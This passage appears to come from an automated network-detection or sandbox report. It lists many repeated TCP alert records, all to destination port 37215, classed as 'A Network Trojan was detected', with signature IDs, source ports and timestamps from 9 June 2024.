          SID:2829579
          Source Port:51282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164505
          SID:2835222
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603529
          SID:2835222
          Source Port:48368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399885
          SID:2835222
          Source Port:46170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083404
          SID:2835222
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290365
          SID:2835222
          Source Port:51792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299377
          SID:2835222
          Source Port:44392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603134
          SID:2829579
          Source Port:34934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079236
          SID:2829579
          Source Port:34704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133721
          SID:2829579
          Source Port:40886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032722
          SID:2829579
          Source Port:57236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417700
          SID:2835222
          Source Port:58022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157822
          SID:2829579
          Source Port:37568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077244
          SID:2835222
          Source Port:34698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822546
          SID:2835222
          Source Port:35794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677400
          SID:2835222
          Source Port:45086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036313
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909359
          SID:2835222
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602202
          SID:2829579
          Source Port:49482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028370
          SID:2835222
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567987
          SID:2835222
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292185
          SID:2829579
          Source Port:41470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079342
          SID:2835222
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012850
          SID:2835222
          Source Port:41358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865906
          SID:2835222
          Source Port:41330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820744
          SID:2835222
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079190
          SID:2835222
          Source Port:37062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162090
          SID:2835222
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165431
          SID:2835222
          Source Port:45944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206006
          SID:2829579
          Source Port:44674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004197
          SID:2829579
          Source Port:59124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599197
          SID:2835222
          Source Port:50276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008117
          SID:2835222
          Source Port:43654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988718
          SID:2829579
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721620
          SID:2829579
          Source Port:43422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033906
          SID:2835222
          Source Port:48604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724163
          SID:2835222
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942056
          SID:2835222
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205480
          SID:2829579
          Source Port:46962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597440
          SID:2835222
          Source Port:42698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724084
          SID:2829579
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823085
          SID:2829579
          Source Port:51718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.473353
          SID:2829579
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104801
          SID:2835222
          Source Port:53338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822368
          SID:2835222
          Source Port:58806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000605
          SID:2829579
          Source Port:47866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946133
          SID:2829579
          Source Port:54852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041368
          SID:2835222
          Source Port:49386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278803
          SID:2829579
          Source Port:57302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222896
          SID:2835222
          Source Port:35748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928094
          SID:2835222
          Source Port:34752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596414
          SID:2829579
          Source Port:48078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472196
          SID:2835222
          Source Port:49158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224431
          SID:2829579
          Source Port:49904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.894663
          SID:2835222
          Source Port:49112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994803
          SID:2829579
          Source Port:46092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632573
          SID:2835222
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644688
          SID:2829579
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632495
          SID:2829579
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477311
          SID:2835222
          Source Port:52698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224722
          SID:2835222
          Source Port:58812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715779
          SID:2835222
          Source Port:45808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563457
          SID:2829579
          Source Port:47466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989553
          SID:2829579
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416168
          SID:2829579
          Source Port:52878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715098
          SID:2835222
          Source Port:36386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986136
          SID:2835222
          Source Port:39958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251322
          SID:2829579
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987505
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027919
          SID:2835222
          Source Port:36196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597413
          SID:2835222
          Source Port:39248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821929
          SID:2835222
          Source Port:53898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417840
          SID:2835222
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719321
          SID:2829579
          Source Port:41710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082097
          SID:2829579
          Source Port:42132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227199
          SID:2835222
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162073
          SID:2835222
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869033
          SID:2829579
          Source Port:38504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995670
          SID:2835222
          Source Port:47890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692001
          SID:2835222
          Source Port:43714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206215
          SID:2829579
          Source Port:45718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718869
          SID:2829579
          Source Port:46468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909325
          SID:2835222
          Source Port:36110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479009
          SID:2835222
          Source Port:51970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082683
          SID:2835222
          Source Port:46396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412025
          SID:2829579
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718692
          SID:2829579
          Source Port:37774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718266
          SID:2835222
          Source Port:36156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032651
          SID:2835222
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416263
          SID:2829579
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822693
          SID:2829579
          Source Port:51770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226284
          SID:2835222
          Source Port:47520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161285
          SID:2829579
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399391
          SID:2829579
          Source Port:37222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600575
          SID:2835222
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682046
          SID:2835222
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.125242
          SID:2835222
          Source Port:58552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718082
          SID:2829579
          Source Port:39054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538089
          SID:2835222
          Source Port:34258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418228
          SID:2835222
          Source Port:56002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466813
          SID:2835222
          Source Port:34056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539950
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164441
          SID:2835222
          Source Port:41410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035246
          SID:2835222
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920083
          SID:2835222
          Source Port:56776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902161
          SID:2829579
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918019
          SID:2835222
          Source Port:48620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158281
          SID:2835222
          Source Port:33860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274698
          SID:2835222
          Source Port:40278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719159
          SID:2835222
          Source Port:47086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242330
          SID:2829579
          Source Port:37412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928396
          SID:2829579
          Source Port:33204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225276
          SID:2835222
          Source Port:39618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599802
          SID:2829579
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159499
          SID:2835222
          Source Port:41772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720649
          SID:2829579
          Source Port:51448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296896
          SID:2835222
          Source Port:51160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925535
          SID:2835222
          Source Port:34006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412402
          SID:2835222
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944241
          SID:2835222
          Source Port:42880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287361
          SID:2829579
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027301
          SID:2835222
          Source Port:48684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822421
          SID:2829579
          Source Port:59180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716476
          SID:2829579
          Source Port:38328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400353
          SID:2835222
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248921
          SID:2835222
          Source Port:37236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539841
          SID:2829579
          Source Port:34086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075385
          SID:2829579
          Source Port:53014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302201
          SID:2835222
          Source Port:36080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821725
          SID:2835222
          Source Port:41612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915623
          SID:2829579
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034650
          SID:2835222
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950060
          SID:2835222
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398350
          SID:2829579
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643455
          SID:2835222
          Source Port:37824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078483
          SID:2835222
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563105
          SID:2829579
          Source Port:37986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468653
          SID:2829579
          Source Port:54926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823565
          SID:2829579
          Source Port:53104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205439
          SID:2835222
          Source Port:38460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076254
          SID:2835222
          Source Port:59474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399559
          SID:2835222
          Source Port:37244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082905
          SID:2835222
          Source Port:38690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038029
          SID:2835222
          Source Port:46008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929008
          SID:2829579
          Source Port:37882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412455
          SID:2835222
          Source Port:54904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658729
          SID:2829579
          Source Port:53508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905953
          SID:2835222
          Source Port:36204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718052
          SID:2829579
          Source Port:60976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471507
          SID:2829579
          Source Port:41526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.297021
          SID:2829579
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477582
          SID:2829579
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413638
          SID:2835222
          Source Port:56864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564266
          SID:2835222
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416214
          SID:2829579
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130830
          SID:2829579
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821512
          SID:2835222
          Source Port:56548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.285077
          SID:2829579
          Source Port:59776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719856
          SID:2835222
          Source Port:47902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987380
          SID:2835222
          Source Port:42198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822712
          SID:2829579
          Source Port:45460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562002
          SID:2835222
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694087
          SID:2829579
          Source Port:46122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289426
          SID:2835222
          Source Port:38436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396679
          SID:2829579
          Source Port:36916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869925
          SID:2835222
          Source Port:40132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715428
          SID:2835222
          Source Port:48938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952421
          SID:2829579
          Source Port:41578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472469
          SID:2829579
          Source Port:45104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2835222
          Source Port:40096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082209
          SID:2835222
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166896
          SID:2829579
          Source Port:47968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714295
          SID:2829579
          Source Port:39824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719757
          SID:2835222
          Source Port:60694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918061
          SID:2835222
          Source Port:55776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102539
          SID:2829579
          Source Port:34966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602164
          SID:2829579
          Source Port:45632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988465
          SID:2835222
          Source Port:55792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604849
          SID:2829579
          Source Port:34770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093667
          SID:2829579
          Source Port:40136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892873
          SID:2835222
          Source Port:58248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916479
          SID:2829579
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162805
          SID:2835222
          Source Port:51522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867323
          SID:2829579
          Source Port:51026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415969
          SID:2835222
          Source Port:50026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917092
          SID:2835222
          Source Port:34482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076235
          SID:2835222
          Source Port:45898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248709
          SID:2829579
          Source Port:47270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039020
          SID:2835222
          Source Port:46598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164999
          SID:2835222
          Source Port:40466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165267
          SID:2835222
          Source Port:40980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596890
          SID:2835222
          Source Port:35890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090397
          SID:2835222
          Source Port:53578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919148
          SID:2829579
          Source Port:44610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207945
          SID:2835222
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223471
          SID:2829579
          Source Port:38012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286695
          SID:2829579
          Source Port:52100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396933
          SID:2835222
          Source Port:58504
          Destination Port:37215
